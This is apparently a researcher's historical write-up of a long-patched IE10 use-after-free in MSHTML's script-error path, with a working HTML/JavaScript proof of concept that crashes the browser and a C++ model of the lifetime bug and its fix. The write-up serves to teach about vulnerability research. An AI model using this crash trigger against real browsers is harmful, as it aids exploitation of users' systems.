I found that if window.open("javascript:1", "_self") was called inside an iframe while an error notification dialog was pending — and the parent simultaneously destroyed that iframe — IE10 crashed with a DEP violation rated EXPLOITABLE. The “Display a notification about every script error” option (enabled by default) was required because the error dialog path was what triggered the vulnerable code in MSHTML!CActiveScriptHolder::OnScriptError.

<!-- index.html (attacker page) -->
<iframe src="iframe.html" sandbox="allow-scripts" scrolling="no" width="680" height="100"></iframe>
<script>
  // Any message from the iframe replaces the body, which destroys the iframe.
  window.onmessage = function()
  {
    document.body.innerHTML = 1;
  }
</script>

<!-- iframe.html -->
<textarea onclick="eval(this.value);" style="width:620px;height:80px;">// CLICK HERE TO RUN THE POC AND CRASH THE BROWSER
parent.postMessage("","*"); // innerHTML that destroys the iFrame.
alert("Close this and then close the ACCESS_DENIED error dialog");
window.open("javascript:1", "_self");
</textarea>

The iframe posted a message asking the parent to destroy it, then blocked its own script with alert. While the alert was open, the parent replaced document.body.innerHTML, destroying the iframe. When the user closed the alert, window.open("javascript:1", "_self") threw an access denied error, which was routed through OnScriptError, but the iframe's Trident (MSHTML) instance was already gone. The fault landed at address 0x000c0000, rated EXPLOITABLE as a software NX / DEP violation in MSHTML!CActiveScriptHolder::OnScriptError+0x175.
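
The lifetime hazard described above, modelled in C++ as an added example (not code from the original post and not MSHTML's code or Microsoft's fix). FrameDoc, Parent, ScriptHolder and the function names are hypothetical stand-ins; the pinned path shows the common hardening of holding a strong reference across the re-entrant dialog and checking for teardown afterwards.

```cpp
#include <functional>
#include <iostream>
#include <memory>
#include <string>

// Hypothetical stand-ins for the engine objects; not MSHTML's real types.
struct FrameDoc { bool detached = false; };  // set when the frame is torn down

struct Parent {
    std::shared_ptr<FrameDoc> frame = std::make_shared<FrameDoc>();
    // Models the parent's onmessage handler replacing document.body.innerHTML.
    void destroyFrame() {
        if (frame) frame->detached = true;
        frame.reset();                       // drop the only owning reference
    }
};

struct ScriptHolder {
    std::weak_ptr<FrameDoc> doc;             // non-owning back-reference
    // Unpinned path: reports whether a raw pointer taken before the modal
    // dialog would dangle afterwards (checked via weak_ptr, so no UB here).
    bool rawPointerDangles(const std::function<void()>& modalLoop) const {
        modalLoop();                         // nested message loop runs parent
        return doc.expired();
    }
    // Pinned path: keep the document alive across the re-entrant call, then
    // check for teardown before touching it.
    std::string onScriptError(const std::function<void()>& modalLoop) const {
        std::shared_ptr<FrameDoc> pinned = doc.lock();
        if (!pinned) return "dropped: frame already destroyed";
        modalLoop();                         // alert / error dialog pumps messages
        if (pinned->detached) return "dropped: frame detached during dialog";
        return "error dialog shown";
    }
};

// Replays the page's sequence against a fresh parent/frame pair.
std::string runPinned(bool parentDestroysFrame) {
    Parent p;
    ScriptHolder h{p.frame};
    return h.onScriptError([&] { if (parentDestroysFrame) p.destroyFrame(); });
}
bool runUnpinned() {
    Parent p;
    ScriptHolder h{p.frame};
    return h.rawPointerDangles([&] { p.destroyFrame(); });
}

int main() { std::cout << runUnpinned() << " " << runPinned(true) << "\n"; }
```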
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.